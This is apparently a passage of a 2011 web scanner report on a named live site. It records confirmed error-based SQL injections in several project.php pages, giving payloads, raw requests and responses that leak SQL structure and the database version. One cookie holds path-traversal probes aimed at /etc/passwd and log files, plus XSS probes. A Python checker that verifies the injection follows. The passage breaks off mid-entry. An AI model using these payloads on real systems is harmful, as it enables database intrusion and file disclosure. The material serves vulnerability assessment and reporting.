select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lgds00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q1hi3t6n4n69hivo1d4evbe9l4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
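The four confirmed entries share one payload, and the response above shows exactly why it counts as confirmed. The CHAR() list in the injected value decodes to the literal `_!@4dilemma`; because the marker is never sent in plain form, its appearance in the response proves the database evaluated the injected subquery. The `floor(rand()*2)` column used as a GROUP BY key over a two-row derived table makes MySQL try to insert the same key into its temporary table twice, and the resulting `Duplicate entry '<marker>:<0|1>' for key 1` error carries the marker out (the trailing 0 or 1 is the random bit, which is why the wede00 response says `:1` and this one says `:0`). The application then echoes the failed statement, so the same error also leaks table and column names and shows that the whole request URI, path and query string, is spliced into `prj.project_page_url = '...'`, which is why `iusrc` (first entry above) and `catId` both work as injection points. The Python below, added here as an illustration and not part of the scanner or the report, decodes the marker, checks a body for the duplicate-key error, and lists the table names the echoed SQL gives away. The body excerpt is the first SELECT of the lgds00 response plus its trailing error; all function and constant names are this example's own.

```python
import re

# Injected catId value, copied from the lgds00 entry above.
INJECTED_CATID = (
    "'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),"
    "CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,"
    "floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'"
)

# Abbreviated excerpt of the lgds00 response body: the first SELECT of the echoed
# statement followed by the MySQL error that terminates the page.
RESPONSE_EXCERPT = (
    "select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
    "from lead_flow_one_pages_details prj left join sub_category cats on "
    "cats.sub_category_id = prj.catId left join lead_flow_template temps on "
    "temps.template_id = prj.templateId left join lead_flow_group grps on "
    "grps.group_id = prj.groupId where prj.project_page_url = "
    "'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),"
    "concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),"
    "CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from "
    "(select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'"
    "Duplicate entry '_!@4dilemma:0' for key 1"
)

_CHAR_LIST = re.compile(r"CONCAT\(((?:CHAR\(\d+\),?)+)\)", re.IGNORECASE)
_CHAR = re.compile(r"CHAR\((\d+)\)", re.IGNORECASE)
# FROM / JOIN followed by an identifier; a derived table "from (select ...)" is skipped.
_TABLE = re.compile(r"\b(?:from|join)\s+([a-z_]\w*)", re.IGNORECASE)


def decode_marker(payload: str) -> str:
    """Rebuild the string the payload assembles from CHAR() calls."""
    m = _CHAR_LIST.search(payload)
    if not m:
        raise ValueError("payload carries no CONCAT(CHAR(...),...) sequence")
    return "".join(chr(int(code)) for code in _CHAR.findall(m.group(1)))


def confirm_error_based(payload: str, body: str):
    """Return (marker, random_bit) if the body carries MySQL's duplicate-key
    error for the injected marker, else None.

    MySQL 5.0 prints 'for key 1'; newer releases print the key name in
    quotes, so both spellings are accepted."""
    marker = decode_marker(payload)
    pat = re.compile(
        r"Duplicate entry '" + re.escape(marker) + r":([01])' for key (?:\d+|'[^']*')"
    )
    m = pat.search(body)
    return (marker, int(m.group(1))) if m else None


def leaked_tables(body: str) -> list:
    """Table names exposed by the echoed statement, in order of first appearance."""
    seen = []
    for name in _TABLE.findall(body):
        if name not in seen:
            seen.append(name)
    return seen


if __name__ == "__main__":
    print(decode_marker(INJECTED_CATID))
    print(confirm_error_based(INJECTED_CATID, RESPONSE_EXCERPT))
    print(leaked_tables(RESPONSE_EXCERPT))
```

A response that merely contains the word "Duplicate" or that reflects the raw payload does not pass this check; only the decoded marker next to the error does, which is what separates a confirmed finding from a reflected one.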
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/phsy00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rpruebc941c547gklms4fomoh6; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

